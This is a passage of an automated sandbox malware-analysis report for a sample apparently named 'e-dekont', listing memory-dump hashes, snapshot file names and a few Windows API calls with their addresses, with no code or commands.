                                                        • Instruction ID: ff28e883ea153eb76566610edc534ca870d31c9e444ed55a7f1b0129bc16df59
                                                        • Opcode Fuzzy Hash: 997231663acbc0beb4cb362dc59ef998f2e3a93587117ec0f77bd73ac4b96dd1
                                                        • Instruction Fuzzy Hash: 5C71A231F002199BDB55DFB9C8906AEBBB6BFD8700F148529E405AB381DF309E06CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xbq$Xbq
                                                        • API String ID: 0-1243427068
                                                        • Opcode ID: e19c866ba94a2a1385df83e2415a5c1697b79f2fb10acd79670ae279f841ce67
                                                        • Instruction ID: 893e1ad816e90fb78c0b9ffb400c816f4b90a83307f41bc4a54432ee718ceab9
                                                        • Opcode Fuzzy Hash: e19c866ba94a2a1385df83e2415a5c1697b79f2fb10acd79670ae279f841ce67
                                                        • Instruction Fuzzy Hash: 44313731B083268BDF995A7A859423EB6EAABC4314F38847DE802C3394DB75CC44C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C2F862
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 4c01d39523276bb9f76e4d37cc98112137f3808ce77a13f4589761624346abc7
                                                        • Instruction ID: 866871cd2574d76da74fe83dd13ec1a7d9d64ab436cd6812919e6aeffc384222
                                                        • Opcode Fuzzy Hash: 4c01d39523276bb9f76e4d37cc98112137f3808ce77a13f4589761624346abc7
                                                        • Instruction Fuzzy Hash: A7713475C05399AFCB11CFA9C880ACEBFB5AF49300F14815EE858AB262C7719955CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 4629d0ca89f99fc20a516aa812fdbf5f5a915533493651f613f5a63c8fb76a05
                                                        • Instruction ID: fffd068f460eb07218ad50b49013fa963bc2dd32d7f65c3a96edc46277d0c198
                                                        • Opcode Fuzzy Hash: 4629d0ca89f99fc20a516aa812fdbf5f5a915533493651f613f5a63c8fb76a05
                                                        • Instruction Fuzzy Hash: D77125B0A00B168FD7A4DF69D44475ABBF5FF98200F008A2ED88697A50DB75F945CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LR^q
                                                        • API String ID: 0-2625958711
                                                        • Opcode ID: 6e44126a08d84526fb9fb3863a7dea0ab32c4f65eddce83ad65c6cce887a9dc9
                                                        • Instruction ID: eb944cdb40275862636da0483b8d86cea2e1d0f4cbd52ebc2ce1c67bede56f79
                                                        • Opcode Fuzzy Hash: 6e44126a08d84526fb9fb3863a7dea0ab32c4f65eddce83ad65c6cce887a9dc9
                                                        • Instruction Fuzzy Hash: 5432BC78A40619DFCF54EF64E994A9DBBB2FF49301F1085AAD409AB368DB306D85CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LR^q
                                                        • API String ID: 0-2625958711
                                                        • Opcode ID: 3d48796a43376ea586337bb3ba64636db42ff78d4bd5126b7a83a22bf9e52936
                                                        • Instruction ID: 25068fe3a080724b152b33e90edf9c33ffb25cde2c34d7dc8e51bd1a34280312
                                                        • Opcode Fuzzy Hash: 3d48796a43376ea586337bb3ba64636db42ff78d4bd5126b7a83a22bf9e52936
                                                        • Instruction Fuzzy Hash: F422BC78A40619DFCF54EF64E994A9DBBB2FF49301F1085A6D409AB368DB306D85CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C2F862
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 31a138d516d6934c328be23e4fbfab81345aee7fbe9f53764cd5637d02b33ef4
                                                        • Instruction ID: 4fb46d55460fcdb7a35aa796f004a3fa66776c451a2cafdf043f3723befe60e0
                                                        • Opcode Fuzzy Hash: 31a138d516d6934c328be23e4fbfab81345aee7fbe9f53764cd5637d02b33ef4
                                                        • Instruction Fuzzy Hash: 1751BFB1D003199FDB14CF9AC884ADEBBB5FF48710F24852EE818AB210D775A985CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c0b35e1678347e0c45145521da06e10587a6c6eaec49efd0c3a55023c6cef64
                                                        • Instruction ID: e91342dfb1815e10981b44af3b881c04b6b949b136e5f33b5dddb77183db0f69
                                                        • Opcode Fuzzy Hash: 1c0b35e1678347e0c45145521da06e10587a6c6eaec49efd0c3a55023c6cef64
                                                        • Instruction Fuzzy Hash: 4A413474A45508DBCF24CF99D480AEDBBB2FF48310F209199E509AB381CB31E886DF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc7e41b6b5f26441ee867377082bf6e6f715ccea718d834c7d4b9c69b03942eb
                                                        • Instruction ID: 60b209e5fc9724fb19d2f9fef21d91ec5a87ebec2f1aae31a7e1be80cfc7fd2e
                                                        • Opcode Fuzzy Hash: fc7e41b6b5f26441ee867377082bf6e6f715ccea718d834c7d4b9c69b03942eb
                                                        • Instruction Fuzzy Hash: 04411374A05609DFCF24CF99D084AEDBBB2FF48314F249199E509AB391CB31A986DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 320f23d1981712cb1ca5739b1c8015a704cef17b213402f3fcb51ee54b8200e5
                                                        • Instruction ID: b88c593adfc3e57d20a0d34e1b8c8239c98dbdb9e6f42b877a81029687aec41c
                                                        • Opcode Fuzzy Hash: 320f23d1981712cb1ca5739b1c8015a704cef17b213402f3fcb51ee54b8200e5
                                                        • Instruction Fuzzy Hash: 4D215BB1D012189BDB24CF9AD884BEEFBF6FF88310F249129E514A3290D7705946DFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06C24D76,?,?,?,?,?), ref: 06C24E37
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06C24D76,?,?,?,?,?), ref: 06C24E37
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 05B48ED6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06C2D439,00000800,00000000,00000000), ref: 06C2D62A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06C2D439,00000800,00000000,00000000), ref: 06C2D62A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06C2D184), ref: 06C2D3BE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q
                                                        • API String ID: 0-74704288
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -)1#
                                                        • API String ID: 0-1789991113
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq
                                                        • API String ID: 0-1245868
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087439536.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_144d000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction ID: 7674014e2b65890e3dddf8ee9b57e6765a523ce4a3eedf3510d0d02cbfbf98fc
                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction Fuzzy Hash: 1911BE75904244CFEB16CF54C5C4B16BFA1FB48318F24C6AED8494B362C33AD44ACB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9d31db15821e8f275fd7896961247df7c02dd3f0e9db23dbd904fcc5d0a159e6
                                                        • Instruction ID: 0fb1a6b3b8958af3d006a3fd192bbae9ed2217de4081df9cdf69cbb8ddab8438
                                                        • Opcode Fuzzy Hash: 9d31db15821e8f275fd7896961247df7c02dd3f0e9db23dbd904fcc5d0a159e6
                                                        • Instruction Fuzzy Hash: 60115B79A00125CFDBA0EF78D45899ABBF4EF482107114969E84ADB311EB35DD02CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 148b4f97dfd522c8daad1a8ac4ba8d8c8f16abd55db79990fc7102ec33a5c3be
                                                        • Instruction ID: 75c7ac7bd6c5bb94c37779fef8b5f5cbcc468b5e6cd0cc94f4521928adcf0f09
                                                        • Opcode Fuzzy Hash: 148b4f97dfd522c8daad1a8ac4ba8d8c8f16abd55db79990fc7102ec33a5c3be
                                                        • Instruction Fuzzy Hash: BC012872B041565FCF02AE65A8106AF7FA7DFC9652B28806EF905DB394DA31DC12C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 252fafd919f059f199734aa321a7b07b37388339178ea4045c962054d34ec653
                                                        • Instruction ID: 5eb1cd32d0ed5e5accd85a11c034448a7b1c5e421dfcc99e54c531317341de70
                                                        • Opcode Fuzzy Hash: 252fafd919f059f199734aa321a7b07b37388339178ea4045c962054d34ec653
                                                        • Instruction Fuzzy Hash: EC1123B6800249DFDF10CF99C945BDEBBF4EF48320F148419E928A7251C339A990DFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cf9e1f165715333b43db09a63b95a8c5e81eb0ed13d492906e465cb6ef1a5c37
                                                        • Instruction ID: ab8f39d064939c1f1a134ade15fb90aabaf503c0417050c221dc6a00aee46609
                                                        • Opcode Fuzzy Hash: cf9e1f165715333b43db09a63b95a8c5e81eb0ed13d492906e465cb6ef1a5c37
                                                        • Instruction Fuzzy Hash: 3901282061A3D16EEB1267346C65AE37FE48F03241F0A4DDAE8C5C7093E514892AC392
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4784c3a87eec4938b54f5dbcbc20ca666b16fafff59e22cb4be7ab5d1be36907
                                                        • Instruction ID: 3d529a64ddb6c927241a9013f25dbe965fc9e55a53b66aa776d3cf56e0f483e3
                                                        • Opcode Fuzzy Hash: 4784c3a87eec4938b54f5dbcbc20ca666b16fafff59e22cb4be7ab5d1be36907
                                                        • Instruction Fuzzy Hash: 52017C302042444FD318AF3AE85455ABBE6AFC5700B20897D94958B669EE24984D87A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc69715ab78dee8d84740f2c0963ec82b073d47d59aba8f60730ee4a6729b9f6
                                                        • Instruction ID: dc2a66f90f3533a53d6a5540a410c1eb4f55d59ba8a0a5e4cd15e5f68ea03bee
                                                        • Opcode Fuzzy Hash: bc69715ab78dee8d84740f2c0963ec82b073d47d59aba8f60730ee4a6729b9f6
                                                        • Instruction Fuzzy Hash: 5AF052349082468FCB918BA4B8153B87B73A782304F00607AD00CC3262CB35481AEB22
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 45bd35e2e12719473bcd01b7fcd32799694300e1842c43bdd4a5083aedb6c4be
                                                        • Instruction ID: b85bcfcd5ae41682010e8f66182d61c5e22a303d75852a8f052ff65e77bba2a7
                                                        • Opcode Fuzzy Hash: 45bd35e2e12719473bcd01b7fcd32799694300e1842c43bdd4a5083aedb6c4be
                                                        • Instruction Fuzzy Hash: 59F03C302402054FC618AF3AD994A5AB6E7FFC4710B508E3994568F778DF74EC4987D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af5355684858f3d2c3171bcc43fed9a8662bcfbecec9d5f29e4102f37d0ce73f
                                                        • Instruction ID: 2f564a60e1ffa2310a9584687368048199987de4bc299330e35ac4d2c0f13ad1
                                                        • Opcode Fuzzy Hash: af5355684858f3d2c3171bcc43fed9a8662bcfbecec9d5f29e4102f37d0ce73f
                                                        • Instruction Fuzzy Hash: B301A870E4021A9FDF54EFBA98546AEBBB5AF48201F108569D419E7254EB385A018F90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4a0ed88326d8edcc9c266691485a7a53d440e020a3407fddf4fe03a8f25532a
                                                        • Instruction ID: a28942b10c14515b89d5d3952ff45f3275ee3c470b24392c0491c37943659950
                                                        • Opcode Fuzzy Hash: f4a0ed88326d8edcc9c266691485a7a53d440e020a3407fddf4fe03a8f25532a
                                                        • Instruction Fuzzy Hash: C3F089363001197F9F055E9DAC449AF7FBBFBC8650B004829F919D7351DF318911A7A9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f159fb3ecafdad9a31fad06d5dc31fc52b5f0a57a9fd3b2dc5a0b38d92346b2
                                                        • Instruction ID: 922d843c7d6a9fdff63695fb951dc0c6bd0e077cc25e3b255506540926491508
                                                        • Opcode Fuzzy Hash: 2f159fb3ecafdad9a31fad06d5dc31fc52b5f0a57a9fd3b2dc5a0b38d92346b2
                                                        • Instruction Fuzzy Hash: 73E02B34D041058FEB50DF58E4092FEB772ABCA310F106439C048A7151CB700915CED2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9d1d336ac83c31175994cb4f9f90240ee95e24277871d97a48364b8d33de17ba
                                                        • Instruction ID: 5c0b6f4e3c9b334d046bac5a8773beeb30edea42106e48c7a7b63fb1bbe86731
                                                        • Opcode Fuzzy Hash: 9d1d336ac83c31175994cb4f9f90240ee95e24277871d97a48364b8d33de17ba
                                                        • Instruction Fuzzy Hash: E2F01770A101258F8B94EF7CC80465A7BF1BF4821072145B9D409EB360EB30DD008B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7d2a01ac196bd730b464d506d9e7bff34f45b38aedcf9ca3f4c8b0c663c8dafd
                                                        • Instruction ID: ec6a8aee668e8c70e08711567434bc405457c7a0438f7a41bf7ae835711843a2
                                                        • Opcode Fuzzy Hash: 7d2a01ac196bd730b464d506d9e7bff34f45b38aedcf9ca3f4c8b0c663c8dafd
                                                        • Instruction Fuzzy Hash: FEE068B2C08182CFCB114BA58C120B9BF32DEE335571490EBC089CB231E624CE02D712
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 552d15628cfa5a6b290b51f540c738e29669385b6f52cb2777e3d98adb4efd41
                                                        • Instruction ID: 6d605bea6714d39a462f0005ba62c18c09936747aa2cc822292729c657a10ad8
                                                        • Opcode Fuzzy Hash: 552d15628cfa5a6b290b51f540c738e29669385b6f52cb2777e3d98adb4efd41
                                                        • Instruction Fuzzy Hash: A1E02235D2532A8BC701AFB5D8100DEFB38FE87320B0041A3D854AB050FB302689C3B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d66e2fd95662f00456ca6f8a86e8bd4bb714d295d23e5b4e30cdf86f9cd2be9c
                                                        • Instruction ID: 885d82eec3dc577a1d2c0c2438f33529350de67465136f27343be31b817ead2f
                                                        • Opcode Fuzzy Hash: d66e2fd95662f00456ca6f8a86e8bd4bb714d295d23e5b4e30cdf86f9cd2be9c
                                                        • Instruction Fuzzy Hash: E4E0D8612092918FD741A77CB8501DEBB66DFCA51070041B9D441CF369DE249D568791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52d95897178cde7ef014696868a3141642f77a747a916513374e44b6ba3bb605
                                                        • Instruction ID: e03d9383b85d82fddbb7a756a5b6e33bf454195d20df6ab6298c5a07c5ae4c9a
                                                        • Opcode Fuzzy Hash: 52d95897178cde7ef014696868a3141642f77a747a916513374e44b6ba3bb605
                                                        • Instruction Fuzzy Hash: 0AF01CB4D4824ADFDB50EF7888552AE7FB1EB09200F2049AEC545E7350EB748A42DF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1142a8d9d285f862e5865623574112acba7b6b10c2c7ee9fcbc364e138e285cc
                                                        • Instruction ID: 7465e947cb1801c3b476d6bded2467e0b211a6992401efbe5356bf50833386ff
                                                        • Opcode Fuzzy Hash: 1142a8d9d285f862e5865623574112acba7b6b10c2c7ee9fcbc364e138e285cc
                                                        • Instruction Fuzzy Hash: 52E0E5B0D4430ADFDB50EFB889056AEBFF5AB08300F60496EC515E7344EB748A429F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
